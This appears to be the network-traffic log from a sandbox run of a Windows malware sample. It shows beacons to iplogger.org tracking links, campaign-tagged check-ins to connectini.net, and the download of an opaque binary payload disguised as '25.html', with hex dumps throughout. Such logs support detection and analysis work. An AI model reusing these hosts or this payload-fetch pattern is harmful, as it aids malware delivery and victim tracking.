                                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                                          2022-05-21 07:32:49 UTC2399OUTGET /1B6Bb7 HTTP/1.1
                                                                                                                          Host: iplogger.org
                                                                                                                          2022-05-21 07:32:49 UTC2399INHTTP/1.1 200 OK
                                                                                                                          Server: nginx
                                                                                                                          Date: Sat, 21 May 2022 07:32:49 GMT
                                                                                                                          Content-Type: image/png
                                                                                                                          Transfer-Encoding: chunked
                                                                                                                          Connection: close
                                                                                                                          Set-Cookie: clhf03028ja=84.17.52.19; expires=Sun, 21-May-2023 07:32:49 GMT; Max-Age=31536000; path=/; secure; HttpOnly; SameSite=Strict
                                                                                                                          Set-Cookie: 312625191410413587=3; expires=Sun, 21-May-2023 07:32:49 GMT; Max-Age=31536000; path=/; secure; HttpOnly; SameSite=Strict
                                                                                                                          Expires: Sat, 21 May 2022 07:32:49 +0000
                                                                                                                          Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                          Strict-Transport-Security: max-age=31536000
                                                                                                                          X-Frame-Options: SAMEORIGIN
                                                                                                                          2022-05-21 07:32:49 UTC2399INData Raw: 31 32 31 0d 0a 0a 4e 6f 74 69 63 65 3a 20 55 6e 64 65 66 69 6e 65 64 20 69 6e 64 65 78 3a 20 48 54 54 50 5f 55 53 45 52 5f 41 47 45 4e 54 20 69 6e 20 2f 68 6f 6d 65 2f 77 77 77 2f 6c 6f 67 67 65 72 73 2f 69 6e 64 65 78 2e 70 68 70 20 6f 6e 20 6c 69 6e 65 20 31 30 0a 0a 4e 6f 74 69 63 65 3a 20 55 6e 64 65 66 69 6e 65 64 20 69 6e 64 65 78 3a 20 48 54 54 50 5f 41 43 43 45 50 54 5f 4c 41 4e 47 55 41 47 45 20 69 6e 20 2f 68 6f 6d 65 2f 77 77 77 2f 6c 6f 67 67 65 72 73 2f 69 6e 64 65 78 2e 70 68 70 20 6f 6e 20 6c 69 6e 65 20 31 36 0a 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 01 00 00 00 01 01 03 00 00 00 25 db 56 ca 00 00 00 03 50 4c 54 45 00 00 00 a7 7a 3d da 00 00 00 01 74 52 4e 53 00 40 e6 d8 66 00 00 00 09 70 48 59 73 00 00 0e c4 00 00 0e c4
                                                                                                                          Data Ascii: 121Notice: Undefined index: HTTP_USER_AGENT in /home/www/loggers/index.php on line 10Notice: Undefined index: HTTP_ACCEPT_LANGUAGE in /home/www/loggers/index.php on line 16PNGIHDR%VPLTEz=tRNS@fpHYs


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                          19192.168.2.449842148.251.234.83443C:\Users\user\AppData\Local\Temp\7zSCE13AF7E\6282924fea1c3_82ebfc59.exe
                                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                                          2022-05-21 07:32:55 UTC2399OUTGET /1Xxky7 HTTP/1.1
                                                                                                                          Host: iplogger.org
                                                                                                                          2022-05-21 07:32:55 UTC2399INHTTP/1.1 200 OK
                                                                                                                          Server: nginx
                                                                                                                          Date: Sat, 21 May 2022 07:32:55 GMT
                                                                                                                          Content-Type: image/png
                                                                                                                          Transfer-Encoding: chunked
                                                                                                                          Connection: close
                                                                                                                          Set-Cookie: clhf03028ja=84.17.52.19; expires=Sun, 21-May-2023 07:32:55 GMT; Max-Age=31536000; path=/; secure; HttpOnly; SameSite=Strict
                                                                                                                          Set-Cookie: 289998841410413587=3; expires=Sun, 21-May-2023 07:32:55 GMT; Max-Age=31536000; path=/; secure; HttpOnly; SameSite=Strict
                                                                                                                          Expires: Sat, 21 May 2022 07:32:55 +0000
                                                                                                                          Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                          Strict-Transport-Security: max-age=31536000
                                                                                                                          X-Frame-Options: SAMEORIGIN
                                                                                                                          2022-05-21 07:32:55 UTC2400INData Raw: 31 32 31 0d 0a 0a 4e 6f 74 69 63 65 3a 20 55 6e 64 65 66 69 6e 65 64 20 69 6e 64 65 78 3a 20 48 54 54 50 5f 55 53 45 52 5f 41 47 45 4e 54 20 69 6e 20 2f 68 6f 6d 65 2f 77 77 77 2f 6c 6f 67 67 65 72 73 2f 69 6e 64 65 78 2e 70 68 70 20 6f 6e 20 6c 69 6e 65 20 31 30 0a 0a 4e 6f 74 69 63 65 3a 20 55 6e 64 65 66 69 6e 65 64 20 69 6e 64 65 78 3a 20 48 54 54 50 5f 41 43 43 45 50 54 5f 4c 41 4e 47 55 41 47 45 20 69 6e 20 2f 68 6f 6d 65 2f 77 77 77 2f 6c 6f 67 67 65 72 73 2f 69 6e 64 65 78 2e 70 68 70 20 6f 6e 20 6c 69 6e 65 20 31 36 0a 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 01 00 00 00 01 01 03 00 00 00 25 db 56 ca 00 00 00 03 50 4c 54 45 00 00 00 a7 7a 3d da 00 00 00 01 74 52 4e 53 00 40 e6 d8 66 00 00 00 09 70 48 59 73 00 00 0e c4 00 00 0e c4
                                                                                                                          Data Ascii: 121Notice: Undefined index: HTTP_USER_AGENT in /home/www/loggers/index.php on line 10Notice: Undefined index: HTTP_ACCEPT_LANGUAGE in /home/www/loggers/index.php on line 16PNGIHDR%VPLTEz=tRNS@fpHYs


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                          2192.168.2.449787148.251.234.83443C:\Users\user\AppData\Local\Temp\7zSCE13AF7E\6282924fea1c3_82ebfc59.exe
                                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                                          2022-05-21 07:31:49 UTC611OUTGET /1mhvg7 HTTP/1.1
                                                                                                                          Cache-Control: no-cache, no-store
                                                                                                                          Connection: Keep-Alive
                                                                                                                          Pragma: no-cache
                                                                                                                          Accept: */*
                                                                                                                          If-Modified-Since: Sat, 1 Jan 2000 00:00:00 GMT
                                                                                                                          User-Agent: ( Windows 10 Enterprise | x64 | Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz )
                                                                                                                          Host: iplogger.org
                                                                                                                          2022-05-21 07:31:49 UTC612INHTTP/1.1 200 OK
                                                                                                                          Server: nginx
                                                                                                                          Date: Sat, 21 May 2022 07:31:49 GMT
                                                                                                                          Content-Type: image/png
                                                                                                                          Transfer-Encoding: chunked
                                                                                                                          Connection: close
                                                                                                                          Set-Cookie: clhf03028ja=84.17.52.19; expires=Sun, 21-May-2023 07:31:49 GMT; Max-Age=31536000; path=/; secure; HttpOnly; SameSite=Strict
                                                                                                                          Set-Cookie: 316281941410413587=3; expires=Sun, 21-May-2023 07:31:49 GMT; Max-Age=31536000; path=/; secure; HttpOnly; SameSite=Strict
                                                                                                                          Expires: Sat, 21 May 2022 07:31:49 +0000
                                                                                                                          Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                          Strict-Transport-Security: max-age=31536000
                                                                                                                          X-Frame-Options: SAMEORIGIN
                                                                                                                          2022-05-21 07:31:49 UTC612INData Raw: 63 64 0d 0a 0a 4e 6f 74 69 63 65 3a 20 55 6e 64 65 66 69 6e 65 64 20 69 6e 64 65 78 3a 20 48 54 54 50 5f 41 43 43 45 50 54 5f 4c 41 4e 47 55 41 47 45 20 69 6e 20 2f 68 6f 6d 65 2f 77 77 77 2f 6c 6f 67 67 65 72 73 2f 69 6e 64 65 78 2e 70 68 70 20 6f 6e 20 6c 69 6e 65 20 31 36 0a 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 01 00 00 00 01 01 03 00 00 00 25 db 56 ca 00 00 00 03 50 4c 54 45 00 00 00 a7 7a 3d da 00 00 00 01 74 52 4e 53 00 40 e6 d8 66 00 00 00 09 70 48 59 73 00 00 0e c4 00 00 0e c4 01 95 2b 0e 1b 00 00 00 0a 49 44 41 54 08 99 63 60 00 00 00 02 00 01 f4 71 64 a6 00 00 00 00 49 45 4e 44 ae 42 60 82 0d 0a 30 0d 0a 0d 0a
                                                                                                                          Data Ascii: cdNotice: Undefined index: HTTP_ACCEPT_LANGUAGE in /home/www/loggers/index.php on line 16PNGIHDR%VPLTEz=tRNS@fpHYs+IDATc`qdIENDB`0


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                          20192.168.2.44984337.230.138.123443
                                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                                          2022-05-21 07:32:55 UTC2400OUTGET /ip/check.php?duplicate=kenpachi2_registry_goodchannel_lylal_handselfdiyWW HTTP/1.1
                                                                                                                          Host: connectini.net
                                                                                                                          2022-05-21 07:32:55 UTC2400INHTTP/1.1 200 OK
                                                                                                                          Server: nginx
                                                                                                                          Date: Sat, 21 May 2022 07:32:55 GMT
                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                          Transfer-Encoding: chunked
                                                                                                                          Connection: close
                                                                                                                          X-Powered-By: PHP/7.1.33
                                                                                                                          X-Powered-By: PleskLin
                                                                                                                          2022-05-21 07:32:55 UTC2401INData Raw: 34 0d 0a 74 72 75 65 0d 0a 30 0d 0a 0d 0a
                                                                                                                          Data Ascii: 4true0


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                          21192.168.2.44984637.230.138.123443
                                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                                          2022-05-21 07:33:00 UTC2401OUTGET /ip/check.php?duplicate=kenpachi2_registry_goodchannel_lylal_TrueVpnWW HTTP/1.1
                                                                                                                          Host: connectini.net
                                                                                                                          2022-05-21 07:33:00 UTC2401INHTTP/1.1 200 OK
                                                                                                                          Server: nginx
                                                                                                                          Date: Sat, 21 May 2022 07:33:00 GMT
                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                          Transfer-Encoding: chunked
                                                                                                                          Connection: close
                                                                                                                          X-Powered-By: PHP/7.1.33
                                                                                                                          X-Powered-By: PleskLin
                                                                                                                          2022-05-21 07:33:00 UTC2401INData Raw: 34 0d 0a 74 72 75 65 0d 0a 30 0d 0a 0d 0a
                                                                                                                          Data Ascii: 4true0


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                          22192.168.2.44984937.230.138.123443
                                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                                          2022-05-21 07:33:01 UTC2401OUTGET /ip/check.php?duplicate=kenpachi2_registry_goodchannel_lylal_HamperWW HTTP/1.1
                                                                                                                          Host: connectini.net
                                                                                                                          2022-05-21 07:33:01 UTC2401INHTTP/1.1 200 OK
                                                                                                                          Server: nginx
                                                                                                                          Date: Sat, 21 May 2022 07:33:01 GMT
                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                          Transfer-Encoding: chunked
                                                                                                                          Connection: close
                                                                                                                          X-Powered-By: PHP/7.1.33
                                                                                                                          X-Powered-By: PleskLin
                                                                                                                          2022-05-21 07:33:01 UTC2401INData Raw: 34 0d 0a 74 72 75 65 0d 0a 30 0d 0a 0d 0a
                                                                                                                          Data Ascii: 4true0


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                          23192.168.2.449853148.251.234.83443C:\Users\user\AppData\Local\Temp\7zSCE13AF7E\6282924fea1c3_82ebfc59.exe
                                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                                          2022-05-21 07:33:01 UTC2401OUTGET /2DiK57 HTTP/1.1
                                                                                                                          Host: iplogger.org
                                                                                                                          Connection: Keep-Alive
                                                                                                                          2022-05-21 07:33:01 UTC2401INHTTP/1.1 302 Found
                                                                                                                          Server: nginx
                                                                                                                          Date: Sat, 21 May 2022 07:33:01 GMT
                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                          Transfer-Encoding: chunked
                                                                                                                          Connection: close
                                                                                                                          Set-Cookie: clhf03028ja=84.17.52.19; expires=Sun, 21-May-2023 07:33:01 GMT; Max-Age=31536000; path=/; secure; HttpOnly; SameSite=Strict
                                                                                                                          Set-Cookie: 367109031410413587=3; expires=Sun, 21-May-2023 07:33:01 GMT; Max-Age=31536000; path=/; secure; HttpOnly; SameSite=Strict
                                                                                                                          Expires: Sat, 21 May 2022 07:33:01 +0000
                                                                                                                          Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                          Location: https://cdn.discordapp.com/attachments/951968113971322883/972949998243287050/12.png
                                                                                                                          Strict-Transport-Security: max-age=31536000
                                                                                                                          X-Frame-Options: SAMEORIGIN
                                                                                                                          2022-05-21 07:33:01 UTC2402INData Raw: 61 64 0d 0a 0a 4e 6f 74 69 63 65 3a 20 55 6e 64 65 66 69 6e 65 64 20 69 6e 64 65 78 3a 20 48 54 54 50 5f 55 53 45 52 5f 41 47 45 4e 54 20 69 6e 20 2f 68 6f 6d 65 2f 77 77 77 2f 6c 6f 67 67 65 72 73 2f 69 6e 64 65 78 2e 70 68 70 20 6f 6e 20 6c 69 6e 65 20 31 30 0a 0a 4e 6f 74 69 63 65 3a 20 55 6e 64 65 66 69 6e 65 64 20 69 6e 64 65 78 3a 20 48 54 54 50 5f 41 43 43 45 50 54 5f 4c 41 4e 47 55 41 47 45 20 69 6e 20 2f 68 6f 6d 65 2f 77 77 77 2f 6c 6f 67 67 65 72 73 2f 69 6e 64 65 78 2e 70 68 70 20 6f 6e 20 6c 69 6e 65 20 31 36 0a 0d 0a 30 0d 0a 0d 0a
                                                                                                                          Data Ascii: adNotice: Undefined index: HTTP_USER_AGENT in /home/www/loggers/index.php on line 10Notice: Undefined index: HTTP_ACCEPT_LANGUAGE in /home/www/loggers/index.php on line 160


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                          24192.168.2.449864104.21.40.196443
                                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                                          2022-05-21 07:33:03 UTC2402OUTGET /25.html HTTP/1.1
                                                                                                                          Connection: Keep-Alive
                                                                                                                          Accept: */*
                                                                                                                          User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                                                                                                                          Host: v.xyzgamev.com
                                                                                                                          2022-05-21 07:33:04 UTC2403INHTTP/1.1 200 OK
                                                                                                                          Date: Sat, 21 May 2022 07:33:04 GMT
                                                                                                                          Content-Length: 571382
                                                                                                                          Connection: close
                                                                                                                          Last-Modified: Mon, 02 May 2022 05:43:51 GMT
                                                                                                                          ETag: "8b7f6-5de00e085c726"
                                                                                                                          Accept-Ranges: bytes
                                                                                                                          CF-Cache-Status: DYNAMIC
                                                                                                                          Expect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=4mmGDNVHd6YXjEsLRoWlgsg73OfjQw4lWqTWRe14N0pKm9cPbUEVNbJ7IriKetihcQ15YfLufAM9Y6YmndAPYH6AQslfHpIfOwaidwH1qqzTmJGUpXNZbRFC45W0wDbE%2Bg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                          Server: cloudflare
                                                                                                                          CF-RAY: 70eb9f2a89609bd4-FRA
                                                                                                                          alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400
                                                                                                                          2022-05-21 07:33:04 UTC2404INData Raw: 6b 2d cc 00 48 68 a2 6a 1e ff 91 3f e8 eb cf 4f 7d 33 e8 e1 38 76 2c 29 63 6d 6c 91 54 2f f0 cc da e3 13 56 f7 72 dc 93 17 ef b9 d6 f6 6e a7 3f 79 0d 18 6f 7a 23 56 af da b4 fe ed f5 98 4e ff 7b 1f d0 a6 ee ed e2 21 f0 cc cb f9 59 17 22 e3 9a d9 29 76 85 54 92 2e d7 2e dd 9b 1f e8 dc a4 ee 55 62 a7 56 d4 d4 2a db a9 29 c5 95 9d 38 94 ca 85 2c 17 25 16 7b 34 c2 79 57 72 41 ec 61 33 36 26 1a 18 2c e3 bc fe 18 56 f0 be ea f2 a2 6c 39 fc 79 0d c0 a4 e6 33 39 fc 79 0d ca 07 77 57 a6 6a f4 6f 78 ae 06 0d f6 e7 49 9f 9c 3b 86 aa 25 f7 11 70 b7 62 0c e8 3e da cb 6a a7 82 b6 92 a6 6a 1e 88 61 77 54 92 dc 72 a2 86 a6 6a 2e a6 12 17 6f f7 2f c5 8e 37 d4 17 dd 9a 2c 3d 75 6b a7 e1 69 df d2 2f 68 e1 eb a3 a6 6a 2a 6a ee 50 a6 6a 09 c4 88 3f e2 a5 2d 58 11 6b a7 d2 52
                                                                                                                          Data Ascii: k-Hhj?O}38v,)cmlT/Vrn?yoz#VN{!Y")vT..UbV*)8,%{4yWrAa36&,Vl9y39ywWjoxI;%pb>jjawTrj.o/7,=uki/hj*jPj?-XkR
                                                                                                                          2022-05-21 07:33:04 UTC2405INData Raw: 7c 36 16 cb 25 d7 b3 d0 7a 2f af e9 18 f8 08 e8 12 13 73 d7 7f ba e6 3e a5 6a db 2d 73 f3 6b d7 da 2f 13 3a e9 1b d6 ff d5 a2 12 11 fb d7 c9 3e 7c 2f 81 0e d6 68 a7 16 e0 be 32 2f 13 14 52 e6 84 c5 2d f3 1b c5 0d c7 00 6b a2 ba c9 d2 39 fc 79 0d ca 07 ef ce a7 6a c3 af 36 5a a7 6a f4 6f c2 af d8 ae 06 0d 6c 26 fc fa 25 f3 55 44 e3 2e 60 e8 02 c6 eb 26 eb e1 74 3e 22 96 36 67 fa de a7 6a 2c a2 d4 d1 e2 2f 57 3d 00 fa 35 a6 16 15 6e 14 f1 00 2e be 0a 11 58 0e cf 99 68 3e cb 9f 6b c7 c4 27 e8 96 2e c8 7c 2f 68 e1 a5 ec a7 6a 66 44 58 f3 53 ef d4 1f 60 26 2a e4 f4 c4 59 e7 d4 bc 0e 14 29 55 5d 62 63 5b fa 04 16 14 1b 15 27 28 86 89 6c e5 db af 2b f1 c5 bc 0a a9 62 17 69 d3 d6 db 8b f3 5b e7 d4 a6 c0 49 66 21 53 e7 d4 96 c0 72 2e a6 16 e8 ec dc 69 db da 96 2e
                                                                                                                          Data Ascii: |6%z/s>j-sk/:>|/h2/R-k9yj6Zjol&%UD.`&t>"6gj,/W=5n.Xh>k'.|/hjfDXS`&*Y)U]bc['(l+bi[If!Sr.i.
                                                                                                                          2022-05-21 07:33:04 UTC2406INData Raw: 2f 6f 25 a8 af e8 ae 0e de 08 c0 12 01 fc 33 7b d7 ca 3d 7a e1 a0 e9 a7 6a 2c a4 1a 11 41 ff 57 e9 1c 52 d3 5c 66 8c 36 9e 2c 29 e4 e0 23 2f 1e 16 ad d2 d0 41 49 ec e4 a8 a6 af 31 68 0a c0 1e 03 e2 de 8b b9 61 d3 d8 b4 16 07 2a 7f 3d b4 02 11 61 df 1d a1 7b cf 96 49 47 6b 6e 29 7b cb d8 b4 1a 01 1d 53 d2 db e0 2a 70 f5 2f ec e2 df 54 67 fb 36 e2 4c 14 c9 a0 6a 6b 82 f5 94 e4 d5 53 3d dc 53 cc 68 5a c2 0e 42 f5 2f 12 0c e7 6a a2 c3 8f d5 cf ea 27 6a f4 6f 0e c0 2e 85 54 41 4f 5a 54 ea bc 6e a6 bf c9 d2 39 78 9b 84 a4 32 37 ff a2 bd c9 1b 6a 67 af 5c 91 62 ae 5c 7c 0b 58 1a a7 e8 42 43 ea 6d a1 3d cc 52 cc 67 40 a2 0a 8a a5 49 8d 61 a6 65 a9 6a 87 4e a3 6a a5 10 dc 1f be 66 c6 68 a7 7a 8a d7 37 4a 17 e3 2f ef 22 ee a2 63 ab 6f 24 6a 2b e0 21 69 77 bf a2 6a
                                                                                                                          Data Ascii: /o%3{=zj,AWR\f6,)#/AI1ha*=a{IGkn){S*p/Tg6LjkS=ShZB/j'jo.TAOZTn9x27jg\b\|XBCm=Rg@IaejNjfhz7J/"co$j+!iwj
                                                                                                                          2022-05-21 07:33:04 UTC2407INData Raw: 27 a8 a8 0b c4 25 fb c4 4d 0b e1 5c d7 18 63 f6 a8 36 69 24 5d 25 ad 5c 5c 99 1c 22 54 67 8e 42 be 03 d7 6e 47 8b 68 71 7c 6a e8 fe 7c a3 96 8f ac fb 6f cb 62 ca 0b 7a be 7a 97 5c 83 16 cd 62 ff c5 8f cd 96 5c 5b 94 da ea a4 fc a6 26 f6 64 b7 f1 92 ca f6 2a 2c a4 0a bf 5a 2a 1d 25 a2 2f 6d e3 f5 ae 16 1b 97 3a cb 30 a1 32 70 80 a2 da 07 6e bc b5 75 f1 ea e8 fd c6 36 7b 68 e3 01 8b 97 78 21 1f 48 50 23 d8 1b 65 14 1d f3 ba 51 a4 3f c5 8b eb f5 7f 92 7c 96 9f 55 6b c6 0d d5 85 62 6b ca 99 3c b2 64 0a 57 8d cf 6b 7a 21 90 21 13 29 94 0f 42 90 fc b0 69 3f d7 4d 95 4f e3 f5 f5 74 52 51 69 7d 4a 57 e7 2a 24 d2 9c 1f d8 15 d1 79 b7 6a 22 19 25 ec de ac e6 66 1f 01 39 45 d5 8d b1 06 3a 3b ea a1 25 fd 68 b6 8c 86 b1 79 66 ff a0 fa 39 dc fa 9b e6 1f fc b9 bf d6 7e
                                                                                                                          Data Ascii: '%M\c6i$]%\\"TgBnGhq|j|obzz\b\[&d*,Z*%/m:02pnu6{hx!HP#eQ?|Ukbk<dWkz!!)Bi?MOtRQi}JW*$yj"%f9E:;%hyf9~
                                                                                                                          2022-05-21 07:33:04 UTC2408INData Raw: 98 43 b1 5b 17 f4 b8 48 90 7f 5b c2 1f cf f4 70 51 a3 8c 7e 28 bc aa 12 c5 24 cc 0d ca 07 3f f2 ff d2 47 2c ed 98 e7 5d 2a 67 b7 7f 20 2a 92 cf 1c 5e 3a 2e d2 10 5d 2a 3f c7 d4 93 2c 63 29 19 98 c5 75 97 80 73 c9 f5 a7 6a a8 d3 5c 28 2b 28 97 18 04 b3 0e 35 2f f0 3a eb a9 d3 11 eb 22 72 bb 7a 48 b1 06 de 16 f5 a8 49 54 58 40 6f a3 fd df 91 87 38 ee 5e 80 57 62 53 ce ee b3 f1 e7 22 c5 6b b2 a0 98 65 b8 7e a5 63 80 88 0b 0c a8 8a 80 ad b9 77 ad 63 b8 6a f3 28 b1 8c 51 26 ed 7c 37 69 e4 8a bc 90 14 c1 7e 73 ba ed a6 98 d3 fe b7 de a3 d2 af aa dc 92 16 ef b9 f0 34 8a 2f 69 69 27 3f cd 64 76 74 51 ad 61 46 83 27 a6 ee e3 e2 a5 2c e8 35 6e 36 0b 96 76 1e cf a6 d2 eb 22 1b ab 3a 76 e1 4c d6 ee 53 1a 86 c1 71 c3 ba ad 1f ff 54 72 05 21 07 c6 62 13 15 24 e6 f7 12
                                                                                                                          Data Ascii: C[H[pQ~($?G,]*g *^:.]*?,c)usj\(+(5/:"rzHITX@o8^WbS"ke~cwcj(Q&|7i~s4/ii'?dvtQaF',5n6v":vLSqTr!b$
                                                                                                                          2022-05-21 07:33:04 UTC2409INData Raw: a0 e4 66 26 a2 e9 0b cc 3b 31 ae a0 ee 23 6e 60 e9 e9 1d 33 82 44 72 a3 6a 32 ff a7 e6 44 f2 50 80 a2 ba 69 0c 59 1c 40 15 20 80 32 aa e6 89 4a 05 d7 3a ba 17 07 c8 85 7a 3e be 0a 5c a1 f5 dc b1 8e 5d 44 e1 6b 6f 91 f0 1b 1a ef c2 34 38 b6 9b 47 83 cc cb 52 5c 4b 7f 34 11 37 03 db e7 4a 1c cd 9c 59 6a 0e e2 8e ea 5d 09 7f fc 72 22 86 a7 8c 6e 84 56 58 97 92 14 7a 10 55 78 b6 0a c1 1a c1 76 6c ab 02 d3 1c db 3c af e5 e3 22 a3 1a 18 2a e0 cc 01 59 d5 f7 85 2e 14 68 ab 20 cb 78 97 b0 fe 2f 95 14 27 ae ac 66 6e 65 2a 05 3c d8 0b d9 28 19 86 1a ea bf 44 a0 e9 ea f2 a4 25 77 0d 09 ad a7 46 4c e2 c8 8a bb 29 7f 38 28 9c 9d 7b 5f 15 ab ea 59 50 e3 1f d9 ea e2 a4 4f e1 36 67 a7 11 e3 de 53 c2 70 e3 f9 bd 4d cf d6 b7 ab 85 a7 e3 f5 4d b2 f7 6a 30 bf e5 62 e4 0a fb
                                                                                                                          Data Ascii: f&;1#n`3Drj2DPiY@ 2J:z>\]Dko48GR\K47JYj]r"nVXzUxvl<"*Y.h x/'fne*<(D%wFL)8({_YPO6gSpMMj0b
                                                                                                                          2022-05-21 07:33:04 UTC2411INData Raw: e1 5a 14 bc 49 06 5b 15 e7 72 8a 4c 7f be bc ab 12 81 08 58 6a 13 44 5b 31 1c 7f 7a a0 7a fc 6e f9 04 2b ad ef 19 93 2b d5 e6 24 59 d7 19 9b 1a f4 5d 26 ff 9a 63 e3 15 ac 28 66 29 6f e1 de 9a df 38 67 61 58 f5 a1 f6 a3 f4 6f 29 93 d7 6a ff 62 f5 6f 11 96 03 c7 72 34 43 08 e2 dd e1 9a 22 66 af a2 1e fa bc 2f 59 1c 19 3e 3f 86 23 3d d4 6c ed a7 2a ad 5c 9b e1 e8 ae c7 0c 21 ec 13 d4 20 ae 8a 34 fb 2c 92 f2 2d 59 bd b6 52 57 0e 3e 64 2b 07 9b 8e b2 56 f4 ff 8e 37 c8 1b f4 94 79 4c 83 96 af da e2 46 92 3d e9 a2 e7 3d 2a 09 c7 f6 39 b9 75 61 b0 16 a5 59 4f 85 a8 9e 59 a5 9a 71 8e 6d 62 2c 64 d2 9a 67 fa 82 d2 31 d9 fa 99 e0 b2 8f eb 56 07 9a 0d e7 be 7d 51 34 47 ec 04 30 4d 9e eb 82 8f 4e 00 06 dd 5a 97 12 df cc 60 c7 62 ab e7 af cf 10 7f 3f 21 f6 ab 6c 30 97
                                                                                                                          Data Ascii: ZI[rLXjD[1zzn++$Y]&c(f)o8gaXo)jbor4C"f/Y>?#=l*\! 4,-YRW>d+V7yLF==*9uaYOYqmb,dg1V}Q4G0MNZ`b?!l0
                                                                                                                          2022-05-21 07:33:04 UTC2412INData Raw: d5 38 f1 ac 62 b6 11 5e fa 25 24 d8 82 7c 45 00 71 71 fb 7b 61 e9 25 79 76 25 2e 2a f0 e7 c4 0a 78 ef e9 61 db d0 22 67 ff 67 26 96 43 33 3f 25 be f0 c3 e8 c5 69 6f ef 31 a2 6b c3 a6 1c 1f 13 fc f5 1e 13 d8 53 e8 e3 47 8b 65 e1 93 ef 1f 6f db 9f ce
                                                                                                                          Data Ascii: 8b^%$|Eqq{a%yv%.*xa"gg&C3?%io1kSGeo
                                                                                                                          2022-05-21 07:33:04 UTC2412INData Raw: 88 4a 1c 36 2d a0 ec a4 16 13 7f c7 9f e3 a2 41 ca a0 a6 ad bc 36 de 61 62 93 b7 95 07 2a 2c ac e2 a1 03 0f b3 ff b4 ba 6c a4 1a 1f 7f cf 97 cd c8 ef e0 c7 45 6f 29 24 77 77 7f c3 9b b9 c5 f4 7b 21 f4 f9 7e 03 0f f0 1d c4 69 b2 14 a4 1e 17 29 a4 55 1c a1 51 d5 60 58 e0 3a 7d 8b 82 6b e9 7f d5 f2 ec 64 89 65 ca 21 49 f7 1d 80 05 10 e0 de a6 6d 08 4f 2b 28 24 24 08 78 f4 3d 70 b4 82 f9 2f 27 2f 4a 8d 31 30 c4 cf a8 c3 01 cf 7f 72 eb 60 89 62 a5 2d 9a 57 1a 1a 2e 26 1e df 81 21 d4 6b 72 22 3f 70 90 14 a8 2b 97 fc 6c 61 e7 5d 7b 9c d2 e9 2c 24 ed 55 65 e0 8f ba 2a 6c 9c 96 17 48 d9 b9 e7 79 0c c0 a7 ea 7a 72 89 51 5f 68 2c 1b 9c 44 57 76 5e ab 9c 24 e1 17 da 33 7d 2f 81 80 bc b2 59 53 2c eb d4 98 2e 68 69 22 21 ac 6c 37 c2 8b b2 ec e4 7c 72 e7 81 ff 0a ff 21
                                                                                                                          Data Ascii: J6-A6ab*,lEo)$ww{!~i)UQ`X:}kde!ImO+($$x=p/'/J10r`b-W.&!kr"?p+la]{,$Ue*lHyzrQ_h,DWv^$3}/YS,.hi"!l7|r!
                                                                                                                          2022-05-21 07:33:04 UTC2414INData Raw: 9f fb a3 9b 99 68 5a a7 9e 63 b2 7f 34 e9 c1 d4 11 eb a2 73 b6 de 18 a3 e1 d4 79 6b c6 72 20 38 e9 64 70 9f d2 d1 e7 fa 7a 91 7b 8d bb 56 d6 c2 c1 ee 80 bc 7c 31 32 f2 db 82 05 d4 d0 c9 bb 26 9f fc c8 6d 2c f6 d2 fa 0f 6b 56 0c 29 e6 ae 06 32 3d af 78 5f a7 6d e4 27 26 a6 ea a4 24 6f 1b 94 e5 7a 1f 11 24 78 2c e5 e4 de 57 eb 27 6a 1f 6f 2d 5d 63 be 74 6d 61 e3 59 f7 be f4 08 84 dd 63 f6 36 a5 26 5b 9d b6 8e 52 7d ac 53 84 a2 08 fe 0f 39 ec 68 a4 bf cb a3 76 b0 0e 2d 6f ed c5 e4 70 e7 67 68 a7 ee b8 ca 60 6f a0 3d f5 5d 5d 22 68 61 0e 0f 28 e5 3e 04 cd f7 70 57 e4 48 2e 11 17 19 54 cc 48 e7 fd 0b aa 50 c9 0c 06 c3 56 96 7f 4b a4 90 90 78 b1 dd 17 5f a5 3c a7 d2 1c 9c a7 d8 b7 98 45 cd 49 c4 19 73 7b 9f c9 41 94 9b 51 e7 c4 4d ea b4 fe ed ae 2f a0 b9 76 df
                                                                                                                          Data Ascii: hZc4sykr 8dpz{V|12&m,kV)2=x_m'&$oz$x,W'jo-]ctmaYc6&[R}S9hv-opgh`o=]]"ha(>pWH.THPVKx_<EIs{AQM/v
